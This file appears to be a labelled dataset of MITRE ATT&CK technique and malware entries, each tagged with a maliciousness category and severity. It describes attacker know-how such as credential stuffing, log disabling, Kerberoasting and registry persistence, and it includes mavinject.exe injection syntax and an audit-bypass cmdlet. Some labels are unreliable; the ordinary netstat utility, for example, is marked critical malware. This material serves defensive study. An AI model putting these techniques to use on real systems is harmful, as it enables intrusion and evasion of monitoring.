{"id": "mitre_00000", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Credential Stuffing\n\nTechnique: T1110.004\nTactics: credential-access\nPlatforms: Windows, SaaS, IaaS, Linux, macOS, Containers, Network Devices, Office Suite, Identity Provider, ESXi\n\nAdversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.\n\nCredential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.\n\nTypically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1110.004", "technique_name": "Credential Stuffing", "tactics": ["credential-access"]}}]}
{"id": "mitre_00001", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Disable or Modify Cloud Logs\n\nTechnique: T1562.008\nTactics: defense-evasion\nPlatforms: IaaS, SaaS, Office Suite, Identity Provider\n\nAn adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.\n\nFor example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) They may alternatively tamper with logging functionality \u2013 for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files.(Citation: AWS Update Trail)(Citation: Pacu Detection Disruption Module) In Office 365, an adversary may disable logging on mail collection activities for specific users by using the `Set-MailboxAuditBypassAssociation` cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user\u2019s license from an Enterprise E5 to an Enterprise E3 license.(Citation: Dark Reading Microsoft 365 Attacks 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1562.008", "technique_name": "Disable or Modify Cloud Logs", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00002", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# HexEval Loader\n\nType: malware\nPlatforms: Linux, macOS, Windows\n\n[HexEval Loader](https://attack.mitre.org/software/S1249) is a hex-encoded loader that collects host data, decodes follow-on scripts and acts as a downloader for the [BeaverTail](https://attack.mitre.org/software/S1246) malware. [HexEval Loader](https://attack.mitre.org/software/S1249) was first reported in April 2025. [HexEval Loader](https://attack.mitre.org/software/S1249) has previously been leveraged by North Korea-affiliated threat actors identified as [Contagious Interview](https://attack.mitre.org/groups/G1052). [HexEval Loader](https://attack.mitre.org/software/S1249) has been delivered to victims through code repository sites utilizing typosquatting naming conventions of various npm packages.(Citation: Socket Contagious Interview NPM April 2025)(Citation: Socket BeaverTail XORIndex HexEval Contagious Interview July 2025)(Citation: Socket HexEval BeaverTail Contagious Interview June 2025)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "HexEval Loader", "malware_type": "malware"}}]}
{"id": "mitre_00003", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Spearphishing Service\n\nTechnique: T1598.001\nTactics: reconnaissance\nPlatforms: PRE\n\nAdversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.(Citation: ThreatPost Social Media Phishing) These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries may create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and information about their environment. Adversaries may also use information from previous reconnaissance efforts (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1598.001", "technique_name": "Spearphishing Service", "tactics": ["reconnaissance"]}}]}
{"id": "mitre_00004", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Establish Accounts\n\nTechnique: T1585\nTactics: resource-development\nPlatforms: PRE\n\nAdversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n\nFor operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n\nEstablishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) In addition, establishing accounts may allow adversaries to abuse free services, such as registering for trial periods to [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) for malicious purposes.(Citation: Free Trial PurpleUrchin)\n", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1585", "technique_name": "Establish Accounts", "tactics": ["resource-development"]}}]}
{"id": "mitre_00005", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Trusted Relationship\n\nTechnique: T1199\nTactics: initial-access\nPlatforms: Windows, SaaS, IaaS, Linux, macOS, Identity Provider, Office Suite\n\nAdversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.\n\nOrganizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers)\n\nIn Office 365 environments, organizations may grant Microsoft partners or resellers delegated administrator permissions. By compromising a partner or reseller account, an adversary may be able to leverage existing delegated administrator relationships or send new delegated administrator offers to clients in order to gain administrative control over the victim tenant.(Citation: Office 365 Delegated Administration)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1199", "technique_name": "Trusted Relationship", "tactics": ["initial-access"]}}]}
{"id": "mitre_00006", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Plist File Modification\n\nTechnique: T1647\nTactics: defense-evasion\nPlatforms: macOS\n\nAdversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist files, such as the info.plist file, to store properties and configuration settings that inform the operating system how to handle the application at runtime. Plist files are structured metadata in key-value pairs formatted in XML based on Apple's Core Foundation DTD. Plist files can be saved in text or binary format.(Citation: fileinfo plist file description) \n\nAdversaries can modify key-value pairs in plist files to influence system behaviors, such as hiding the execution of an application (i.e. [Hidden Window](https://attack.mitre.org/techniques/T1564/003)) or running additional commands for persistence (ex: [Launch Agent](https://attack.mitre.org/techniques/T1543/001)/[Launch Daemon](https://attack.mitre.org/techniques/T1543/004) or [Re-opened Applications](https://attack.mitre.org/techniques/T1547/007)).\n\nFor example, adversaries can add a malicious application path to the `~/Library/Preferences/com.apple.dock.plist` file, which controls apps that appear in the Dock. Adversaries can also modify the LSUIElement key in an application\u2019s info.plist file to run the app in the background. Adversaries can also insert key-value pairs to insert environment variables, such as LSEnvironment, to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation: wardle chp2 persistence)(Citation: eset_osx_flashback)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1647", "technique_name": "Plist File Modification", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00007", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# ESXi Administration Command\n\nTechnique: T1675\nTactics: execution\nPlatforms: ESXi\n\nAdversaries may abuse ESXi administration services to execute commands on guest machines hosted within an ESXi virtual environment. Persistent background services on ESXi-hosted VMs, such as the VMware Tools Daemon Service, allow for remote management from the ESXi server. The tools daemon service runs as `vmtoolsd.exe` on Windows guest operating systems, `vmware-tools-daemon` on macOS, and `vmtoolsd ` on Linux.(Citation: Broadcom VMware Tools Services) \n\nAdversaries may leverage a variety of tools to execute commands on ESXi-hosted VMs \u2013 for example, by using the vSphere Web Services SDK to programmatically execute commands and scripts via APIs such as `StartProgramInGuest`, `ListProcessesInGuest`, `ListFileInGuest`, and `InitiateFileTransferFromGuest`.(Citation: Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023)(Citation: Broadcom Running Guest OS Operations) This may enable follow-on behaviors on the guest VMs, such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083), [Data from Local System](https://attack.mitre.org/techniques/T1005), or [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1675", "technique_name": "ESXi Administration Command", "tactics": ["execution"]}}]}
{"id": "mitre_00008", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Cyclops Blink\n\nType: malware\nPlatforms: Network Devices\n\n[Cyclops Blink](https://attack.mitre.org/software/S0687) is a modular malware that has been used in widespread campaigns by [Sandworm Team](https://attack.mitre.org/groups/G0034) since at least 2019 to target Small/Home Office (SOHO) network devices, including WatchGuard and Asus. [Cyclops Blink](https://attack.mitre.org/software/S0687) is assessed to be a replacement for [VPNFilter](https://attack.mitre.org/software/S1010), a similar platform targeting network devices.(Citation: NCSC Cyclops Blink February 2022)(Citation: NCSC CISA Cyclops Blink Advisory February 2022)(Citation: Trend Micro Cyclops Blink March 2022)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Cyclops Blink", "malware_type": "malware"}}]}
{"id": "mitre_00009", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# QuasarRAT\n\nType: tool\nPlatforms: Windows\n\n[QuasarRAT](https://attack.mitre.org/software/S0262) is an open-source, remote access tool that has been publicly available on GitHub since at least 2014. [QuasarRAT](https://attack.mitre.org/software/S0262) is developed in the C# language.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "QuasarRAT", "malware_type": "tool"}}]}
{"id": "mitre_00010", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Uncommonly Used Port\n\nTechnique: T1065\nTactics: command-and-control\nPlatforms: Linux, macOS, Windows\n\nAdversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1065", "technique_name": "Uncommonly Used Port", "tactics": ["command-and-control"]}}]}
{"id": "mitre_00011", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# CorKLOG\n\nType: malware\nPlatforms: Windows\n\n[CorKLOG](https://attack.mitre.org/software/S1235) is a keylogger known to be leveraged by [Mustang Panda](https://attack.mitre.org/groups/G0129) and was first observed utilized in 2024. [CorKLOG](https://attack.mitre.org/software/S1235) is delivered through a RAR archive (e.g., src.rar), which contains two files: an executable (lcommute.exe) and the [CorKLOG](https://attack.mitre.org/software/S1235) DLL (mscorsvc.dll). [CorKLOG](https://attack.mitre.org/software/S1235) has established persistence on the system by creating services or with scheduled tasks.(Citation: Zscaler PAKLOG CorkLog SplatCloak Splatdropper April 2025)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "CorKLOG", "malware_type": "malware"}}]}
{"id": "mitre_00012", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Security Support Provider\n\nTechnique: T1101\nTactics: persistence\nPlatforms: Windows\n\nWindows Security Support Provider (SSP) DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages and HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.\n (Citation: Graeber 2014)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1101", "technique_name": "Security Support Provider", "tactics": ["persistence"]}}]}
{"id": "mitre_00013", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Non-Standard Encoding\n\nTechnique: T1132.002\nTactics: command-and-control\nPlatforms: ESXi, Linux, macOS, Windows\n\nAdversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1132.002", "technique_name": "Non-Standard Encoding", "tactics": ["command-and-control"]}}]}
{"id": "mitre_00014", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# NanHaiShu\n\nType: malware\nPlatforms: Windows\n\n[NanHaiShu](https://attack.mitre.org/software/S0228) is a remote access tool and JScript backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065). [NanHaiShu](https://attack.mitre.org/software/S0228) has been used to target government and private-sector organizations that have relations to the South China Sea dispute. (Citation: Proofpoint Leviathan Oct 2017) (Citation: fsecure NanHaiShu July 2016)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "NanHaiShu", "malware_type": "malware"}}]}
{"id": "mitre_00015", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# ShadowPad\n\nType: malware\nPlatforms: Windows\n\n[ShadowPad](https://attack.mitre.org/software/S0596) is a modular backdoor that was first identified in a supply chain compromise of the NetSarang software in mid-July 2017. The malware was originally thought to be exclusively used by [APT41](https://attack.mitre.org/groups/G0096), but has since been observed to be used by various Chinese threat activity groups. (Citation: Recorded Future RedEcho Feb 2021)(Citation: Securelist ShadowPad Aug 2017)(Citation: Kaspersky ShadowPad Aug 2017) ", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "ShadowPad", "malware_type": "malware"}}]}
{"id": "mitre_00016", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# RedLine Stealer\n\nType: malware\nPlatforms: Windows\n\n[RedLine Stealer](https://attack.mitre.org/software/S1240) is an information-stealer malware variant first identified in 2020.(Citation: ESET RedLine Stealer November 2024)(Citation: Proofpoint RedLine Stealer March 2020)(Citation: Splunk RedLine Stealer June 2023) [RedLine Stealer](https://attack.mitre.org/software/S1240) is a Malware as a Service (MaaS) and was reportedly sold as either a one-time purchase or a monthly subscription service.(Citation: ESET RedLine Stealer November 2024)(Citation: Veriti RedLine Stealer MAAS April 2023) Information obtained from [RedLine Stealer](https://attack.mitre.org/software/S1240) has been known to be sold on the deep and dark web to Initial Access Brokers (IABs), who use or resell the stolen credentials for further intrusions.(Citation: Kroll RedLine Stealer August 2024)(Citation: Veriti RedLine Stealer MAAS April 2023)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "RedLine Stealer", "malware_type": "malware"}}]}
{"id": "mitre_00017", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# SLOWPULSE\n\nType: malware\nPlatforms: Network Devices\n\n[SLOWPULSE](https://attack.mitre.org/software/S1104) is a malware that was used by [APT5](https://attack.mitre.org/groups/G1023) as early as 2020 including against U.S. Defense Industrial Base (DIB) companies. [SLOWPULSE](https://attack.mitre.org/software/S1104) has several variants and can modify legitimate Pulse Secure VPN files in order to log credentials and bypass single and two-factor authentication flows.(Citation: Mandiant Pulse Secure Zero-Day April 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "SLOWPULSE", "malware_type": "malware"}}]}
{"id": "mitre_00018", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Crimson\n\nType: malware\nPlatforms: Windows\n\n[Crimson](https://attack.mitre.org/software/S0115) is a remote access Trojan that has been used by [Transparent Tribe](https://attack.mitre.org/groups/G0134) since at least 2016.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Crimson", "malware_type": "malware"}}]}
{"id": "mitre_00019", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# KEYMARBLE\n\nType: malware\nPlatforms: Windows\n\n[KEYMARBLE](https://attack.mitre.org/software/S0271) is a Trojan that has reportedly been used by the North Korean government. (Citation: US-CERT KEYMARBLE Aug 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "KEYMARBLE", "malware_type": "malware"}}]}
{"id": "mitre_00020", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Exfiltration Over Other Network Medium\n\nTechnique: T1011\nTactics: exfiltration\nPlatforms: Linux, macOS, Windows\n\nAdversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.\n\nAdversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1011", "technique_name": "Exfiltration Over Other Network Medium", "tactics": ["exfiltration"]}}]}
{"id": "mitre_00021", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Disk Content Wipe\n\nTechnique: T1488\nTactics: impact\nPlatforms: Linux, macOS, Windows\n\nAdversaries may erase the contents of storage devices on specific systems as well as large numbers of systems in a network to interrupt availability to system and network resources.\n\nAdversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk erased instead of individual files.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: Novetta Blockbuster Destructive Malware)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1488", "technique_name": "Disk Content Wipe", "tactics": ["impact"]}}]}
{"id": "mitre_00022", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Password Filter DLL\n\nTechnique: T1174\nTactics: credential-access\nPlatforms: Windows\n\nWindows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as dynamic link libraries (DLLs) containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts.\n\nBefore registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation.\n\nAdversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made. (Citation: Carnal Ownage Password Filters Sept 2013)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1174", "technique_name": "Password Filter DLL", "tactics": ["credential-access"]}}]}
{"id": "mitre_00023", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# CORESHELL\n\nType: malware\nPlatforms: Windows\n\n[CORESHELL](https://attack.mitre.org/software/S0137) is a downloader used by [APT28](https://attack.mitre.org/groups/G0007). The older versions of this malware are known as SOURFACE and newer versions as CORESHELL.(Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "CORESHELL", "malware_type": "malware"}}]}
{"id": "mitre_00024", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Kerberoasting\n\nTechnique: T1208\nTactics: credential-access\nPlatforms: Windows\n\nService principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service (Citation: Microsoft Detecting Kerberoasting Feb 2018)). (Citation: Microsoft SPN) (Citation: Microsoft SetSPN) (Citation: SANS Attacking Kerberos Nov 2014) (Citation: Harmj0y Kerberoast Nov 2016)\n\nAdversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC). (Citation: Empire InvokeKerberoast Oct 2016) (Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials. (Citation: AdSecurity Cracking Kerberos Dec 2015) (Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)\n\nThis same attack could be executed using service tickets captured from network traffic. (Citation: AdSecurity Cracking Kerberos Dec 2015)\n\nCracked hashes may enable Persistence, Privilege Escalation, and Lateral Movement via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078). (Citation: SANS Attacking Kerberos Nov 2014)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1208", "technique_name": "Kerberoasting", "tactics": ["credential-access"]}}]}
{"id": "mitre_00025", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# OSX_OCEANLOTUS.D\n\nType: malware\nPlatforms: macOS\n\n[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) is a macOS backdoor used by [APT32](https://attack.mitre.org/groups/G0050). First discovered in 2015, [APT32](https://attack.mitre.org/groups/G0050) has continued to make improvements using a plugin architecture to extend capabilities, specifically using `.dylib` files. [OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can also determine it's permission level and execute according to access type (`root` or `user`).(Citation: Unit42 OceanLotus 2017)(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "OSX_OCEANLOTUS.D", "malware_type": "malware"}}]}
{"id": "mitre_00026", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Code Signing\n\nTechnique: T1116\nTactics: defense-evasion\nPlatforms: macOS, Windows\n\nCode signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) However, adversaries are known to use code signing certificates to masquerade malware and tools as legitimate binaries (Citation: Janicab). The certificates used during an operation may be created, forged, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates)\n\nCode signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)\n\nCode signing certificates may be used to bypass security policies that require signed code to execute on a system.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1116", "technique_name": "Code Signing", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00027", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Mavinject\n\nTechnique: T1218.013\nTactics: defense-evasion\nPlatforms: Windows\n\nAdversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)\n\nAdversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. C:\\Windows\\system32\\mavinject.exe PID /INJECTRUNNING PATH_DLL).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe may be digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process. \n\nIn addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1218.013", "technique_name": "Mavinject", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00028", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Shell History\n\nTechnique: T1552.003\nTactics: credential-access\nPlatforms: Linux, macOS, Windows\n\nAdversaries may search the command history on compromised systems for insecurely stored credentials.\n\nOn Linux and macOS systems, shells such as Bash and Zsh keep track of the commands users type on the command-line with the \"history\" utility. Once a user logs out, the history is flushed to the user's history file. For each user, this file resides at the same location: for example, `~/.bash_history` or `~/.zsh_history`. Typically, these files keeps track of the user's last 1000 commands.\n\nOn Windows, PowerShell has both a command history that is wiped after the session ends, and one that contains commands used in all sessions and is persistent. The default location for persistent history can be found in `%userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt`, but command history can also be accessed with `Get-History`. Command Prompt (CMD) on Windows does not have persistent history.(Citation: Microsoft about_History)(Citation: Medium)\n\nUsers often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Adversaries can abuse this by looking through the file for potential credentials.(Citation: External to DA, the OS X Way)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1552.003", "technique_name": "Shell History", "tactics": ["credential-access"]}}]}
{"id": "mitre_00029", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# netstat\n\nType: tool\n\n[netstat](https://attack.mitre.org/software/S0104) is an operating system utility that displays active TCP connections, listening ports, and network statistics. (Citation: TechNet Netstat)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "netstat", "malware_type": "tool"}}]}
